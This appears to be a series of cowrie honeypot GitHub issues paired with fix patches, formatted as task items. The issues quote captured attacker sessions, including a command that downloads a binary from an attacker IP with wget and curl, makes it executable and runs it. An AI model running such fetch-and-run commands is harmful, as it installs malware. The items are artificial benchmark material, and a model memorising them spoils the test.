e['system'] exceptions.KeyError: 'system' ```
Which log message generates this? A particular one or all of them? cowrie.log is where I'm seeing the error; I don't see the same in cowrie.json. Ok! The plugin can take multiple types of messages (new connection, new download, etc). Do you see the error with all messages or only a particular one? I'm guessing if you add:
```python
from pprint import pprint
pprint(e)
```
https://github.com/micheloosterhof/cowrie/blob/master/cowrie/output/csirtg.py#L43 it'll show what the log message looks like, and if you change:
```
e['system']
```
to
```
e.get('system')
```
that error will resolve itself (at least as a work-around). By skimming it, it looks like some new message types have been added (or the 'system' keyword was changed to something else?) @micheloosterhof Tried testing this and didn't have any issue, but the best practice would be to use `.get()` to get the values (https://docs.quantifiedcode.com/python-anti-patterns/correctness/not_using_get_to_return_a_default_value_from_a_dictionary.html) If you think using get would be good then I'll make a PR, and if not then you can just close the issue, because I didn't have this kind of problem myself. I think the issue is that there are sometimes log entries without the `system` field; they show up like so in cowrie.log: `2019-03-14T06:18:37.755918Z [Uninitialized] connected to 127.0.0.1:8443` The CSIRTG plugin will have issues with this format. The other output plugins seem to work without needing to access `system`, so it could probably be rewritten in a different way. M. @micheloosterhof Rewritten in another way, meaning without having to use the `system` field, or rewritten completely? Also, if it's not very important, maybe we can just put it in a `try/except` for now
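To make the failure mode and the suggested `.get()` work-around concrete, a self-contained sketch (the sample entry is invented; real entries without `system` look like the `[Uninitialized]` line quoted above):
```python
entry = {"src_ip": "127.0.0.1", "timestamp": "2019-03-14T06:18:37Z"}

try:
    system = entry["system"]          # raises KeyError on such entries
except KeyError as exc:
    print("indexing failed:", exc)

system = entry.get("system", None)    # the suggested work-around
if system not in ("cowrie.ssh.factory.CowrieSSHFactory",
                  "cowrie.telnet.transport.HoneyPotTelnetFactory"):
    print("skipping entry without a known system:", system)
```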
2019-03-14T19:29:01
cowrie/cowrie
1,060
cowrie__cowrie-1060
[ "703" ]
6010a4c0b0158c5034ef07e06871a9002334f228
diff --git a/src/cowrie/output/reversedns.py b/src/cowrie/output/reversedns.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/reversedns.py @@ -0,0 +1,68 @@ +from __future__ import absolute_import, division + +from twisted.names import client +from twisted.python import log + +import cowrie.core.output +from cowrie.core.config import CONFIG + + +class Output(cowrie.core.output.Output): + """ + Output plugin used for reverse DNS lookup + """ + + def __init__(self): + self.timeout = CONFIG.getint('output_reversedns', 'timeout', fallback=3) + cowrie.core.output.Output.__init__(self) + + def start(self): + """ + Start Output Plugin + """ + pass + + def stop(self): + """ + Stop Output Plugin + """ + pass + + def write(self, entry): + if entry['eventid'] == 'cowrie.session.connect': + self.reversedns(entry['src_ip']) + + def reversedns(self, addr): + """ + Perform a reverse DNS lookup on an IP + + Arguments: + addr -- IPv4 Address + """ + ptr = self.reverseNameFromIPAddress(addr) + d = client.lookupPointer(ptr, timeout=self.timeout) + + def cbError(failure): + log.msg("reversedns: Error in lookup") + failure.printTraceback() + + def processResult(result): + """ + Process the lookup result + """ + RR = result[0][0] + log.msg("Reverse DNS record for ip={0}: {1}".format( + addr, RR.payload)) + + d.addCallback(processResult) + d.addErrback(cbError) + return d + + def reverseNameFromIPAddress(self, address): + """ + Reverse the IPv4 address and append in-addr.arpa + + Arguments: + address {str} -- IP address that is to be reversed + """ + return '.'.join(reversed(address.split('.'))) + '.in-addr.arpa'
Reverse DNS ##### ISSUE TYPE - Feature Idea ##### DESCRIPTION Add the ability to enable Reverse DNS lookups. At the moment a detection contains the IP of the attacker. We would also like to see the Reverse DNS of the attacker. We can look up the reverse DNS afterwards in Elasticsearch or in the logstash pipeline, but we need to use the local DNS servers of the device which runs Cowrie in order to see the internal reverse DNS/hostnames.
@micheloosterhof @ZeNiRe Can you please give me some more information on this? I mean, we can add an option in the config file to enable and disable this, and for actually doing this with Python we can either do something like
```python
import socket
reverse = socket.gethostbyaddr(IP)[0]
```
or we can use something more powerful like [dnspython](https://github.com/rthalley/dnspython) to get more info. The thing I am confused about is where this should be added in Cowrie, i.e. which files would have to be changed to actually implement it. Also, if you think there's some other/better way to do it, then please let me know.
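For illustration, a runnable sketch contrasting the blocking `socket` approach mentioned above with the PTR-name helper that a non-blocking Twisted lookup (as in the merged plugin) would query; the function names here are illustrative:
```python
import socket

def reverse_lookup_blocking(ip):
    # The quick socket-based variant from the comment above. It works,
    # but it blocks, which is why the merged plugin uses twisted.names.
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

def ptr_name(ip):
    # The PTR record name a resolver queries for an IPv4 address.
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"

print(ptr_name("192.0.2.10"))  # 10.2.0.192.in-addr.arpa
```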
2019-03-17T08:39:42
cowrie/cowrie
1,063
cowrie__cowrie-1063
[ "1062" ]
6010a4c0b0158c5034ef07e06871a9002334f228
diff --git a/src/cowrie/shell/pwd.py b/src/cowrie/shell/pwd.py --- a/src/cowrie/shell/pwd.py +++ b/src/cowrie/shell/pwd.py @@ -117,7 +117,7 @@ def setpwentry(self, name): """ # ensure consistent uid and gid - seed_id = crc32(name) + seed_id = crc32(name.encode("utf-8")) seed(seed_id) e = {}
Can't enter using "oracle" or "tomcat" users Hello. I'm using stock userdb.txt file, where "oracle" and "tomcat" users are defined with any password. When using these users, the ssh client gives me an error of "Permission denied (publickey,password)" after entering three times any password. The ugly thing is that in cowrie.json file appear entries of "cowrie.login.success" type with the message "login attempt [oracle/password] suceeded", which is, obviously, incorrect. Thanks a lot
2019-03-19T01:17:52
cowrie/cowrie
1,065
cowrie__cowrie-1065
[ "982" ]
bcf20d85dbadeeb158044a6581ce76aacc27a289
diff --git a/src/cowrie/output/greynoise.py b/src/cowrie/output/greynoise.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/greynoise.py @@ -0,0 +1,124 @@ +""" +Send attackers IP to GreyNoise +""" + +from __future__ import absolute_import, division + +import json + +from twisted.internet import reactor +from twisted.internet.ssl import ClientContextFactory +from twisted.python import log +from twisted.web import client, http_headers +from twisted.web.client import FileBodyProducer + +import cowrie.core.output +from cowrie.core.config import CONFIG + +try: + from BytesIO import BytesIO +except ImportError: + from io import BytesIO + + +COWRIE_USER_AGENT = 'Cowrie Honeypot' +GNAPI_URL = 'http://api.greynoise.io:8888/v1/' + + +class Output(cowrie.core.output.Output): + + def __init__(self): + self.apiKey = CONFIG.get('output_greynoise', 'api_key', fallback=None) + self.tags = CONFIG.get('output_greynoise', 'tags', fallback="all").split(",") + cowrie.core.output.Output.__init__(self) + + def start(self): + """ + Start output plugin + """ + self.agent = client.Agent(reactor, WebClientContextFactory()) + + def stop(self): + """ + Stop output plugin + """ + pass + + def write(self, entry): + if entry['eventid'] == "cowrie.session.connect": + self.scanip(entry) + + def scanip(self, entry): + """Scan IP againt Greynoise API + """ + gnUrl = '{0}query/ip'.format(GNAPI_URL).encode('utf8') + headers = http_headers.Headers({'User-Agent': [COWRIE_USER_AGENT]}) + fields = {'key': self.apiKey, 'ip': entry['src_ip']} + body = FileBodyProducer(BytesIO(json.dumps(fields).encode('utf8'))) + d = self.agent.request(b'POST', gnUrl, headers, body) + + def cbResponse(response): + """ + Main response callback, checks HTTP response code + """ + if response.code == 200: + d = client.readBody(response) + d.addCallback(cbBody) + return d + else: + log.msg("GN Request failed: {} {}".format( + response.code, response.phrase)) + return + + def cbBody(body): + """ + Received body + """ + return processResult(body) + + def cbPartial(failure): + """ + Google HTTP Server does not set Content-Length. Twisted marks it as partial + """ + return processResult(failure.value.response) + + def cbError(failure): + failure.printTraceback() + + def processResult(result): + """ + Extract the information we need from the body + """ + result = result.decode('utf8') + j = json.loads(result) + if j['status'] == "ok": + if "all" not in self.tags: + for query in j['records']: + if query['name'] in self.tags: + message(query) + else: + for query in j['records']: + message(query) + else: + log.msg("GreyNoise Status is Unknown for IP {0}".format(entry['src_ip'])) + + def message(query): + log.msg( + eventid='cowrie.greynoise', + format='Greynoise Scan for %(IP)% with %(tag)% have %(conf)% confidence' + 'along with the following %(meta)% metatdata', + IP=entry['src_ip'], + tag=query['name'], + conf=query['confidence'], + meta=query['metadata'] + ) + + d.addCallback(cbResponse) + d.addErrback(cbError) + return d + + +class WebClientContextFactory(ClientContextFactory): + + def getContext(self, hostname, port): + return ClientContextFactory.getContext(self)
Write GreyNoise API output plugin https://github.com/GreyNoise-Intelligence/api.greynoise.io
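A small sketch of the tag-filtering behaviour the new plugin applies to GreyNoise query results; the record contents below are invented for illustration:
```python
def filter_records(records, tags):
    # "all" reports every record; otherwise only records whose name
    # matches one of the configured tags are reported.
    if "all" in tags:
        return records
    return [r for r in records if r["name"] in tags]

records = [{"name": "SSH Scanner", "confidence": "high"},
           {"name": "Web Crawler", "confidence": "low"}]
print(filter_records(records, ["SSH Scanner"]))
```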
2019-03-20T15:12:08
cowrie/cowrie
1,093
cowrie__cowrie-1093
[ "1086" ]
94408f8c41d697f15782f9d5fb73e8f22c1e64e6
diff --git a/src/cowrie/output/greynoise.py b/src/cowrie/output/greynoise.py --- a/src/cowrie/output/greynoise.py +++ b/src/cowrie/output/greynoise.py @@ -6,7 +6,7 @@ import treq -from twisted.internet import defer +from twisted.internet import defer, error from twisted.python import log import cowrie.core.output @@ -59,10 +59,15 @@ def message(query): headers = ({'User-Agent': [COWRIE_USER_AGENT]}) fields = {'key': self.apiKey, 'ip': entry['src_ip']} - response = yield treq.post( - url=gnUrl, - data=fields, - headers=headers) + try: + response = yield treq.post( + url=gnUrl, + data=fields, + headers=headers, + timeout=10) + except (defer.CancelledError, error.ConnectingCancelledError, error.DNSLookupError): + log.msg("GreyNoise requests timeout") + return if response.code != 200: rsp = yield response.text() @@ -72,13 +77,14 @@ def message(query): j = yield response.json() if self.debug: log.msg("greynoise: debug: "+repr(j)) - if j['status'] == "ok": - if "all" not in self.tags: - for query in j['records']: - if query['name'] in self.tags: - message(query) - else: - for query in j['records']: + + if j['status'] == "ok": + if "all" not in self.tags: + for query in j['records']: + if query['name'] in self.tags: message(query) else: - log.msg("greynoise: no results for for IP {0}".format(entry['src_ip'])) + for query in j['records']: + message(query) + else: + log.msg("greynoise: no results for for IP {0}".format(entry['src_ip']))
greynoise should catch timeout error ```2019-04-08T03:12:05.460833Z [twisted.internet.defer#critical] Unhandled error in Deferred: 2019-04-08T03:12:05.462257Z [twisted.internet.defer#critical] Traceback (most recent call last): --- <exception caught here> --- File "/home/cowrie/cowrie/src/cowrie/output/greynoise.py", line 65, in scanip headers=headers) twisted.internet.error.TimeoutError: User timeout caused connection failure. ```
I think this can be fixed by passing `timeout=10` to the treq request we are sending in [greynoise.py Line#62](https://github.com/cowrie/cowrie/blob/master/src/cowrie/output/greynoise.py#L62). So the request will become: ```python response = yield treq.post( url=gnUrl, data=fields, headers=headers, timeout=10) ```
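The same idea as a standalone sketch (Python 3 syntax; the merged fix applies it inside `scanip`):
```python
import treq

from twisted.internet import defer, error
from twisted.python import log

@defer.inlineCallbacks
def post_with_timeout(url, fields, headers):
    # Bound the request and swallow the errors Twisted raises when the
    # deadline fires, instead of letting them become unhandled Deferreds.
    try:
        response = yield treq.post(url=url, data=fields,
                                   headers=headers, timeout=10)
    except (defer.CancelledError,
            error.ConnectingCancelledError,
            error.DNSLookupError):
        log.msg("GreyNoise request timed out")
        return
    return response
```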
2019-04-16T11:40:45
cowrie/cowrie
1,095
cowrie__cowrie-1095
[ "854" ]
338e2edc4ab5096d759d608e751af3b415b9220d
diff --git a/src/cowrie/shell/command.py b/src/cowrie/shell/command.py --- a/src/cowrie/shell/command.py +++ b/src/cowrie/shell/command.py @@ -43,6 +43,9 @@ def __init__(self, protocol, *args): # MS-DOS style redirect handling, inside the command # TODO: handle >>, 2>, etc if '>' in self.args or '>>' in self.args: + if self.args[-1] in ['>', ">>"]: + self.errorWrite("-bash: parse error near '\\n' \n") + return self.writtenBytes = 0 self.writefn = self.write_to_file if '>>' in self.args:
exceptions.IndexError: list index out of range I have recently deployed cowrie on a CentOS Linux 7.5 host and have seen a few of the following exceptions occurring.
```
2018-08-13T09:46:46.286838+0300 [CowrieTelnetTransport,68,[redacted]] login attempt [root/] succeeded
2018-08-13T09:46:46.289616+0300 [CowrieTelnetTransport,68,[redacted]] Initialized emulated server as architecture: linux-x64-lsb
2018-08-13T09:46:46.981872+0300 [CowrieTelnetTransport,68,[redacted]] Warning: state changed and new state returned
2018-08-13T09:46:59.394970+0300 [CowrieTelnetTransport,68,[redacted]] CMD: >/dev/netslink/.t && cd /dev/netslink/ && for a in `ls -a /dev/netslink/`; do >$a; done; >retrieve
2018-08-13T09:46:59.397926+0300 [CowrieTelnetTransport,68,[redacted]] Command found: > /dev/netslink/.t
2018-08-13T09:46:59.398837+0300 [CowrieTelnetTransport,68,[redacted]] Command found: cd /dev/netslink/
2018-08-13T09:46:59.400542+0300 [CowrieTelnetTransport,68,[redacted]] Can't find command None
2018-08-13T09:46:59.400790+0300 [CowrieTelnetTransport,68,[redacted]] Command not found: for a in ` ls -a /dev/netslink/ `
2018-08-13T09:46:59.404197+0300 [CowrieTelnetTransport,68,[redacted]] Command found: do >
2018-08-13T09:46:59.404647+0300 [CowrieTelnetTransport,68,[redacted]] Unhandled Error
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite
    why = selectable.doRead()
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/tcp.py", line 243, in doRead
    return self._dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 636, in dataReceived
    self.applicationDataReceived(b''.join(appDataBuffer))
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 988, in applicationDataReceived
    self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 1035, in dataReceived
    self.protocol.dataReceived(data)
  File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 107, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived
    m()
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 324, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN
    self.lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 183, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 104, in lineReceived
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 122, in start
    self.exit()
  File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 140, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 218, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 192, in call_command
    obj.start()
  File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 122, in start
    self.exit()
  File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 140, in exit
    self.protocol.cmdstack[-1].resume()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 218, in resume
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 211, in runCommand
    runOrPrompt()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 113, in runOrPrompt
    self.runCommand()
  File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in call_command
    obj = cmd(self, *args)
  File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 53, in __init__
    self.outfile = self.fs.resolve_path(str(self.args[(index + 1)]), self.protocol.cwd)
exceptions.IndexError: list index out of range
2018-08-13T09:46:59.408466+0300 [CowrieTelnetTransport,[redacted]] Duplicate TTY log with hash 0c58d3d66a63aeca0c3e68d928a26ff686d1e08f0d1c70fca45d0ed955cf833f
2018-08-13T09:46:59.408836+0300 [CowrieTelnetTransport,68,[redacted]] Closing TTY Log: log/tty/0c58d3d66a63aeca0c3e68d928a26ff686d1e08f0d1c70fca45d0ed955cf833f after 12 seconds
2018-08-13T09:46:59.411186+0300 [CowrieTelnetTransport,68,[redacted]] Connection lost after 47 seconds
```
That seems to be a bug in the redirection code. Thanks for reporting this!
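The crash and the guard the patch adds can be reduced to a few lines; the helper name below is illustrative, not cowrie's actual parser:
```python
def redirect_target(args):
    # A trailing '>' has no filename after it, which is what blew up in
    # command.py when it indexed args[index + 1]; real bash rejects it
    # with a parse error, so the fix bails out early the same way.
    if args and args[-1] in (">", ">>"):
        raise ValueError("-bash: parse error near '\\n'")
    for i, arg in enumerate(args):
        if arg in (">", ">>"):
            return args[i + 1]
    return None

print(redirect_target(["echo", "hi", ">", "out.txt"]))  # out.txt
```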
2019-04-16T14:57:33
cowrie/cowrie
1,167
cowrie__cowrie-1167
[ "1166" ]
bf422e424c683cffef883243ac50ff1afbcff51c
diff --git a/src/cowrie/shell/protocol.py b/src/cowrie/shell/protocol.py --- a/src/cowrie/shell/protocol.py +++ b/src/cowrie/shell/protocol.py @@ -227,7 +227,9 @@ def connectionMade(self): HoneyPotBaseProtocol.connectionMade(self) self.setTimeout(60) self.cmdstack = [honeypot.HoneyPotShell(self, interactive=False)] - self.cmdstack[0].lineReceived(self.execcmd) + # TODO: quick and dirty fix to deal with \n separated commands + # HoneypotShell() needs a rewrite to better work with pending input + self.cmdstack[0].lineReceived("; ".join(self.execcmd.split('\n'))) def keystrokeReceived(self, keyID, modifier): self.input_data += keyID
Failure to process multiple commands separated by a LF **Describe the bug** Just noticed the following SSH session in the JSON log: ```json {"eventid": "cowrie.session.connect", "src_ip": "104.223.142.185", "src_port": 39191, "timestamp": "2019-07-08T05:52:52.258121Z", "message": "New connection: 104.223.142.185:39191 (192.168.0.6:22) [session: c936ee87fa9e]", "dst_ip": "192.168.0.6", "system": "cowrie.ssh.factory.CowrieSSHFactory", "protocol": "ssh", "isError": 0, "session": "c936ee87fa9e", "dst_port": 22, "sensor": "yoda"} {"macCS": ["hmac-sha1", "hmac-sha1-96", "hmac-md5", "hmac-md5-96", "hmac-ripemd160", "[email protected]"], "session": "c936ee87fa9e", "kexAlgs": ["diffie-hellman-group14-sha1", "diffie-hellman-group-exchange-sha1", "diffie-hellman-group1-sha1"], "message": "Remote SSH version: SSH-2.0-PUTTY", "system": "HoneyPotSSHTransport,2129,104.223.142.185", "src_ip": "104.223.142.185", "version": "SSH-2.0-PUTTY", "sensor": "yoda", "eventid": "cowrie.client.version", "timestamp": "2019-07-08T05:52:52.442134Z", "keyAlgs": ["ssh-rsa", "ssh-dss"], "isError": 0, "compCS": ["none"], "encCS": ["aes128-ctr", "aes192-ctr", "aes256-ctr", "aes256-cbc", "[email protected]", "aes192-cbc", "aes128-cbc", "blowfish-cbc", "arcfour128", "arcfour", "cast128-cbc", "3des-cbc"]} {"eventid": "cowrie.login.success", "username": "root", "timestamp": "2019-07-08T05:52:53.940595Z", "message": "login attempt [root/_] succeeded", "system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "password": "_", "sensor": "yoda"} {"eventid": "cowrie.command.input", "timestamp": "2019-07-08T05:52:54.973525Z", "message": "CMD: #!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://104.223.142.185/a21jj\ncurl -O http://104.223.142.185/a21jj\nchmod +x a21jj\n./a21jj\n", "system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "input": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://104.223.142.185/a21jj\ncurl -O http://104.223.142.185/a21jj\nchmod +x a21jj\n./a21jj\n", "sensor": "yoda"} {"eventid": "cowrie.command.input", "timestamp": "2019-07-08T05:52:55.923271Z", "message": "CMD: ls -la /var/run/gcc.pid", "system": "SSHChannel session (1) on SSHService 'ssh-connection' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "input": "ls -la /var/run/gcc.pid", "sensor": "yoda"} {"eventid": "cowrie.session.closed", "timestamp": "2019-07-08T05:52:56.339826Z", "message": "Connection lost after 4 seconds", "system": "HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "duration": 4.080965995788574, "session": "c936ee87fa9e", "sensor": "yoda"} ``` It is some XorDDoS variant. Notice how the attacker has issued an input command, consisting of multiple commands separated by a `\n` character. For some reason, Cowrie has failed to process this. There are `wget` and `curl` commands - but Cowrie has made no attempt to download from the URLs passed as their arguments - there is no `cowrie.command.success` event (or `cowrie.command.failed` event) and no `cowrie.session.file_download` or `cowrie.session.file_upload` events. 
Is this some deficiency of the logging - or has Cowrie really failed to process these commands because they are a single line separated by a newline instead of by a semicolon? **Expected behavior** I would expect to see in the logs that the command have been successfully (or unsuccessfully) executed and the corresponding files - downloaded. **Server (please complete the following information):** - OS: Linux yoda 4.15.0-52-generic #56~16.04.1-Ubuntu SMP Thu Jun 6 12:03:31 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Python: Python 2.7.12
This is an exec command, right? Not an interactive session? I can reproduce this for an exec command. Right now we don't split the exec requests by \n, and it's only interpreted as a single command. This means we'll need to fix this. regards, Michel.
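A minimal sketch of the normalisation the patch applies to such exec requests (the URL below is a sanitised placeholder, not the one from the captured session):
```python
execcmd = ("PATH=$PATH:/usr/local/sbin:/usr/local/bin\n"
           "wget http://203.0.113.5/sample\n"
           "chmod +x sample\n"
           "./sample\n")

# Quick-and-dirty fix from the patch: rewrite the blob as one
# ';'-separated command line before feeding it to the shell emulator.
print("; ".join(execcmd.split("\n")))
```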
2019-07-11T07:08:14
cowrie/cowrie
1,234
cowrie__cowrie-1234
[ "1233", "1233" ]
7fc2b26ff86d36eec2d6199b418d44a8c533d4c7
diff --git a/src/cowrie/commands/ls.py b/src/cowrie/commands/ls.py --- a/src/cowrie/commands/ls.py +++ b/src/cowrie/commands/ls.py @@ -4,6 +4,7 @@ from __future__ import absolute_import, division import getopt +import os.path import stat import time @@ -61,7 +62,7 @@ def call(self): for path in paths: func(path) - def do_ls_normal(self, path): + def get_dir_files(self, path): try: if self.protocol.fs.isdir(path) and not self.showDirectories: files = self.protocol.fs.get_path(path)[:] @@ -69,8 +70,9 @@ def do_ls_normal(self, path): dot = self.protocol.fs.getfile(path)[:] dot[fs.A_NAME] = '.' files.append(dot) - # FIXME: should grab dotdot off the parent instead - dotdot = self.protocol.fs.getfile(path)[:] + dotdot = self.protocol.fs.getfile(os.path.split(path)[0])[:] + if not dotdot: + dotdot = self.protocol.fs.getfile(path)[:] dotdot[fs.A_NAME] = '..' files.append(dotdot) else: @@ -82,6 +84,10 @@ def do_ls_normal(self, path): self.write( 'ls: cannot access %s: No such file or directory\n' % (path,)) return + return files + + def do_ls_normal(self, path): + files = self.get_dir_files(path) line = [x[fs.A_NAME] for x in files] if not line: @@ -104,26 +110,7 @@ def do_ls_normal(self, path): self.write('\n') def do_ls_l(self, path): - try: - if self.protocol.fs.isdir(path) and not self.showDirectories: - files = self.protocol.fs.get_path(path)[:] - if self.showHidden: - dot = self.protocol.fs.getfile(path)[:] - dot[fs.A_NAME] = '.' - files.append(dot) - # FIXME: should grab dotdot off the parent instead - dotdot = self.protocol.fs.getfile(path)[:] - dotdot[fs.A_NAME] = '..' - files.append(dotdot) - else: - files = [x for x in files if not x[fs.A_NAME].startswith('.')] - files.sort() - else: - files = (self.protocol.fs.getfile(path)[:],) - except Exception: - self.write( - 'ls: cannot access %s: No such file or directory\n' % (path,)) - return + files = self.get_dir_files(path) largest = 0 if len(files):
'ls -al' incorrectly shows '..' files as duplicates of '.' When using ls inside a cowrie instance the '..' entry is just a duplicate of the '.' entry. The group and user information is often wrong. This is a very easy to check fingerprint of cowrie. **To Reproduce** Steps to reproduce the behavior: 1. SSH into a cowrie instance. 2. `cd /home/richard` 3. `ls -al` 4. The '..' entry has ownership 'richard richard' **Expected behavior** The information for the parent folder should be retrieved. In the case of '/home' from '/home/richard' the owner of '/home' should read as 'root root' 'ls -al' incorrectly shows '..' files as duplicates of '.' When using ls inside a cowrie instance the '..' entry is just a duplicate of the '.' entry. The group and user information is often wrong. This is a very easy to check fingerprint of cowrie. **To Reproduce** Steps to reproduce the behavior: 1. SSH into a cowrie instance. 2. `cd /home/richard` 3. `ls -al` 4. The '..' entry has ownership 'richard richard' **Expected behavior** The information for the parent folder should be retrieved. In the case of '/home' from '/home/richard' the owner of '/home' should read as 'root root'
2019-10-21T03:22:24
cowrie/cowrie
1,237
cowrie__cowrie-1237
[ "1236" ]
2d8dbb9aa19f47acc7901708dc8e76f62174850b
diff --git a/src/cowrie/commands/ls.py b/src/cowrie/commands/ls.py --- a/src/cowrie/commands/ls.py +++ b/src/cowrie/commands/ls.py @@ -112,9 +112,17 @@ def do_ls_normal(self, path): def do_ls_l(self, path): files = self.get_dir_files(path) - largest = 0 + filesize_str_extent = 0 if len(files): - largest = max([x[fs.A_SIZE] for x in files]) + filesize_str_extent = max([len(str(x[fs.A_SIZE])) for x in files]) + + user_name_str_extent = 0 + if len(files): + user_name_str_extent = max([len(self.uid2name(x[fs.A_UID])) for x in files]) + + group_name_str_extent = 0 + if len(files): + group_name_str_extent = max([len(self.gid2name(x[fs.A_GID])) for x in files]) for file in files: if file[fs.A_NAME].startswith('.') and not self.showHidden: @@ -167,9 +175,9 @@ def do_ls_l(self, path): line = '%s 1 %s %s %s %s %s%s' % \ (perms, - self.uid2name(file[fs.A_UID]), - self.gid2name(file[fs.A_GID]), - str(file[fs.A_SIZE]).rjust(len(str(largest))), + self.uid2name(file[fs.A_UID]).ljust(user_name_str_extent), + self.gid2name(file[fs.A_GID]).ljust(group_name_str_extent), + str(file[fs.A_SIZE]).rjust(filesize_str_extent), time.strftime('%Y-%m-%d %H:%M', ctime), file[fs.A_NAME], linktarget)
`ls -l` user/group names need justification `ls -l` does not properly pad the user/group names **To Reproduce** Steps to reproduce the behaviour: 1. ssh into a cowrie instance 2. `ls -l` on a directory with more than one user/group 3. the user names and group names don't line up between files **Expected behaviour** Nice justified columns of user/group names
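A minimal sketch of the width computation the fix introduces; the file tuples are invented sample data:
```python
files = [("root", "root", 4096, "bin"),
         ("richard", "richard", 220, ".bash_logout")]

# One pass over the listing: widest size (right-justified) and widest
# user/group names (left-justified), as real ls does.
size_w = max(len(str(size)) for _, _, size, _ in files)
user_w = max(len(user) for user, _, _, _ in files)
group_w = max(len(group) for _, group, _, _ in files)

for user, group, size, name in files:
    print("-rw-r--r-- 1 %s %s %s %s" % (user.ljust(user_w),
                                        group.ljust(group_w),
                                        str(size).rjust(size_w),
                                        name))
```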
2019-10-24T05:05:53
cowrie/cowrie
1,244
cowrie__cowrie-1244
[ "1243" ]
17e5215fdfe67341912020f3907d43aa10a10a92
